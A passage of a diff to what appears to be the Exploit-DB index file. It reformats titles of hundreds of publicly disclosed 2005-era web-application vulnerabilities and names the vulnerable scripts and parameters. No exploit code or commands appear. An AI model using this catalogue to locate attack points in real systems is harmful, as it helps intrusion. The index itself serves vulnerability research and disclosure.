25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps,0 @@ -28029,26 +28030,26 @@ id,file,description,date,author,platform,type,port 25065,platforms/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",php,webapps,0 25067,platforms/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",cgi,webapps,0 25068,platforms/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 -25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 +25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - 'accountsettings_add.html?accountid' Cross-Site Scripting",2005-01-28,ShineShadow,php,webapps,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 25074,platforms/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 -25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce - Mensresp.asp Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps,0 +25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce - 'Mensresp.asp' Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",asp,webapps,0 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,windows,webapps,0 25087,platforms/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,php,webapps,0 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 - 'index.php' SQL Injection",2005-02-09,Zeelock,php,webapps,0 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0 -25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0 -25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0 -25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 - importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 -25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 - importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0 +25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0 +25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 - 'importcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 - 'importcc.php' CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion",2005-02-15,"RedTeam Pentesting",php,webapps,0 25105,platforms/php/webapps/25105.txt,"osCommerce 2.2 - 'Contact_us.php' Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 -25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x - Logfile Parameter Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps,0 +25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x - 'Logfile' Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps,0 25109,platforms/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injections",2005-02-16,Exoduks,php,webapps,0 25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 25111,platforms/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,php,webapps,0 @@ -28059,10 +28060,10 @@ id,file,description,date,author,platform,type,port 25116,platforms/php/webapps/25116.txt,"paFaq beta4 - 'search.php?search_item' SQL Injection",2005-02-17,pi3ch,php,webapps,0 25117,platforms/php/webapps/25117.txt,"paFaq beta4 - 'comment.php' Multiple SQL Injections",2005-02-17,pi3ch,php,webapps,0 25118,platforms/php/webapps/25118.txt,"BibORB 1.3.2 - 'bibindex.php?search' Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 -25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 +25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database 'Description' Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple SQL Injections",2005-02-17,"Patrick Hof",php,webapps,0 -25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 +25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ''ComGetLogFile.php3?fm' Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 @@ -28088,14 +28089,14 @@ id,file,description,date,author,platform,type,port 25168,platforms/php/webapps/25168.c,"phpBB 2.0.x - Authentication Bypass (1)",2005-02-28,Paisterist,php,webapps,0 25169,platforms/php/webapps/25169.pl,"phpBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,php,webapps,0 25170,platforms/php/webapps/25170.cpp,"phpBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps,0 -25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - CATID Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 -25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - SHOW Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 +25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - 'CATID' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 +25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - 'SHOW' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - 'mod.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - 'SendPM.php' Directory Traversal",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 -25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 +25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - 'DelPM.php' Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 @@ -28116,17 +28117,17 @@ id,file,description,date,author,platform,type,port 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - 'Guestbook.php' SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - 'AdFrame.php' Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 -25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 +25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0 25232,platforms/php/webapps/25232.txt,"McNews 1.x - 'install.php' Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0 -25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0 +25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'search.asp' Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps,0 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",php,webapps,0 25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - 'avatar.php?img' Cross-Site Scripting",2005-03-19,Romano,php,webapps,0 -25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php' login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 +25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php?login' SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - 'Highlight.php' File Disclosure",2005-03-19,"Majid NT",php,webapps,0 40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0 @@ -28139,12 +28140,12 @@ id,file,description,date,author,platform,type,port 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 -25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0 -25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 +25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0 +25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 -25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 -25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 +25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 +25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - 'msg.php' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - 'membres.php?mt' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 @@ -28153,14 +28154,14 @@ id,file,description,date,author,platform,type,port 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 - 'Calendar_Scheduler.php' Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 -25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 +25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,php,webapps,0 25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-25,mircia,php,webapps,0 25278,platforms/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - 'pages.php?idpages' SQL Injection",2005-03-26,Dcrab,php,webapps,0 25279,platforms/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - 'products1.php?id2' SQL Injection",2005-03-26,Dcrab,php,webapps,0 25280,platforms/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 -25282,platforms/php/webapps/25282.txt,"Nuke BookMarks 0.6 - Marks.php Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 +25282,platforms/php/webapps/25282.txt,"Nuke BookMarks 0.6 - 'Marks.php' Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25284,platforms/php/webapps/25284.txt,"Nuke BookMarks 0.6 - 'Marks.php' SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 @@ -28200,45 +28201,45 @@ id,file,description,date,author,platform,type,port 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 -25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x 'Downloads' Module - Lid Parameter Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 +25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x 'Downloads' Module - 'Lid' Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25344,platforms/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25345,platforms/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,asp,webapps,0 -25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.asp SQL Injection",2005-04-06,Dcrab,asp,webapps,0 +25347,platforms/asp/webapps/25347.txt,"Active Auction House - 'ItemInfo.asp' SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25348,platforms/asp/webapps/25348.txt,"Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25349,platforms/asp/webapps/25349.txt,"Active Auction House - 'account.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25350,platforms/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script - Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps,0 -25351,platforms/asp/webapps/25351.txt,"Active Auction House - sendpassword.asp Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 -25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.asp Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 +25351,platforms/asp/webapps/25351.txt,"Active Auction House - 'sendpassword.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 +25352,platforms/asp/webapps/25352.txt,"Active Auction House - 'WatchThisItem.asp' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Full Path Disclosures",2005-04-06,"John Cobb",php,webapps,0 25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php?add' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 -25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 -25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 -25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 - SID Parameter SQL Injection",2005-04-08,Dcrab,php,webapps,0 -25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - 'index.php' read Parameter Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 -25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - 'index.php' mode Parameter SQL Injection",2005-04-09,Dcrab,php,webapps,0 +25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - 'OP' Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 +25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - 'Module' Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 +25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 - 'SID' SQL Injection",2005-04-08,Dcrab,php,webapps,0 +25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - 'index.php?read' Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 +25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - 'index.php?mode' SQL Injection",2005-04-09,Dcrab,php,webapps,0 25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - 'faq.php?farea' Cross-Site Scripting",2005-04-09,Dcrab,php,webapps,0 25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-09,Dcrab,php,webapps,0 25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,php,webapps,0 25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,php,webapps,0 25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"James Bercegay",php,webapps,0 -25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - C_CODE Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 -25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - Aid Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 +25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 +25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps,0 -25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x - ST Parameter SQL Injection",2005-04-11,Dcrab,php,webapps,0 +25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x - 'ST' SQL Injection",2005-04-11,Dcrab,php,webapps,0 25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,php,webapps,0 25382,platforms/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,php,webapps,0 -25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - Comersus_Search_Item.asp Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 +25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - 'Comersus_Search_Item.asp' Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0 25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - 'GroupCP.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25399,platforms/php/webapps/25399.txt,"PHPBB2 Plus 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 -25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 +25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - 'Portal.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - 'viewtopic.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25403,platforms/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - 'Album_Cat.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - 'Album_Comment.php' Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 @@ -28265,7 +28266,7 @@ id,file,description,date,author,platform,type,port 25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-18,"GulfTech Security",php,webapps,0 25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - '/sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - '/tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 -25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php' cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 +25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 @@ -28277,10 +28278,10 @@ id,file,description,date,author,platform,type,port 25456,platforms/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 25457,platforms/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps,0 25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 - 'message.php' Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 -25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 +25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor 